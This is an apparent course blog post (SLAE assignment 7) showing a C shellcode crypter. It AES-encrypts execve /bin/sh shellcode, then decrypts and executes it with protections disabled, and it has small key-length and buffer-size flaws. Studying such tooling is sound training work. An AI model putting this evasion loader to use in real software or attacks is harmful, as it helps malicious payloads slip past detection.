Assignment_7 – Custom Crypter

This  post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-581
###

 This task includes building a shellcode crypter/decrypter. 
The C code below contains all necessary to encrypt and decrypt our shellcode:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
###
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <gcrypt.h>

#define ENCR 1                  //1  - when encrypt //0 when decrypt
const char *key = "mysecret";   //Set password
uint8_t iniVector[16] = {0x05}; //Set the initialization vector

static void myCrypt(int, size_t, uint8_t *);
uint8_t origShellCode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
#if !ENCR
uint8_t encrShellCode[] = "\xcd\xa4\xf1\x17\xd0\x0a\xcf\x89\x57\xb7\x60\xea\xcd\x74\xbe\xeb\x47\x7a\xdb\x18\xb0\x00\x3d\xc9\x14";
#endif

int main(){

    int i, ag = gcry_cipher_map_name("aes128");
    size_t len = strlen(origShellCode);
    uint8_t *buff = malloc(len);

    myCrypt(ag, len, buff);
#if ENCR
        for(i=0; i<len; i++){
            printf("\\x%02x", buff[i]);
        }
        printf("\n");
#else
        int (*ret)() = (int(*)())buff;
        printf("Running shellcode...\n");
        ret();
#endif

    free(buff);
    return 0;
}

static void myCrypt(int algo, size_t len, uint8_t *buff){

        gcry_cipher_hd_t hd;
        gcry_cipher_open(&hd, algo, GCRY_CIPHER_MODE_OFB, 0);
        gcry_cipher_setkey(hd, key, 16);
        gcry_cipher_setiv(hd, iniVector, 16);

#if ENCR
        gcry_cipher_encrypt(hd, buff, len, origShellCode, len);
#else
        gcry_cipher_decrypt(hd, buff, len, encrShellCode, len);
#endif
        gcry_cipher_close(hd);
}

In our example we will encrypt execve shellcode:

 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

 Depending on #define ENCR value the script will encrypt (define ENCR 1
 ) or decrypt (define ENCR 0) an appropriate code pasted in:

 origShellCode[]


and

encrShellCode[]

respectively.

 I  decided to use gcrypt library for encryption/decryption process.

 Libgcrypt is a general purpose cryptographic library based on the code from GnuPG. It provides functions for all cryptograhic building blocks: symmetric ciphers (AES, DES, Blowfish, CAST5, Twofish, SEED, Camellia, Arcfour), hash algorithms (MD4, MD5, RIPE-MD160, SHA-1, SHA_224, SHA-256, SHA-384, SHA-512, TIGER-192, Whirlpool), MACs (HMAC for all hash algorithms), public key algorithms (RSA, Elgamal, DSA, ECDSA), large integer functions, random numbers and a lot of supporting functions.

 Encrypter/decrypter uses aes128 (Advanced Encryption Standard with ket length 128 bits).
Password is hardcoded (mysecret).

Let's compile our code:
gcc megacrypter.c -o megacrypter -lgcrypt -fno-stack-protector -z execstack

and run it:
root@debian:/usr/local/src/SLAE/7_assigment# ./megacrypter

\xcd\xa4\xf1\x17\xd0\x0a\xcf\x89\x57\xb7\x60\xea\xcd\x74\xbe\xeb\x47\x7a\xdb\x18\xb0\x00\x3d\xc9\x14

output of encryptor is nothing but our encrypted shellcode.
Let's paste it in encrShellCode[] and change define ENCR to 0.

Recompile it:
root@debian:/usr/local/src/SLAE/7_assigment# gcc megacrypter.c -o megacrypter -lgcrypt -fno-stack-
protector -z execstack

Then run it:



works fine!

This is the last assignment of SLAE)
Many thanks to Vivek and the team at SecurityTube for the course!


No comments:

Post a Comment

Subscribe to: Posts (Atom)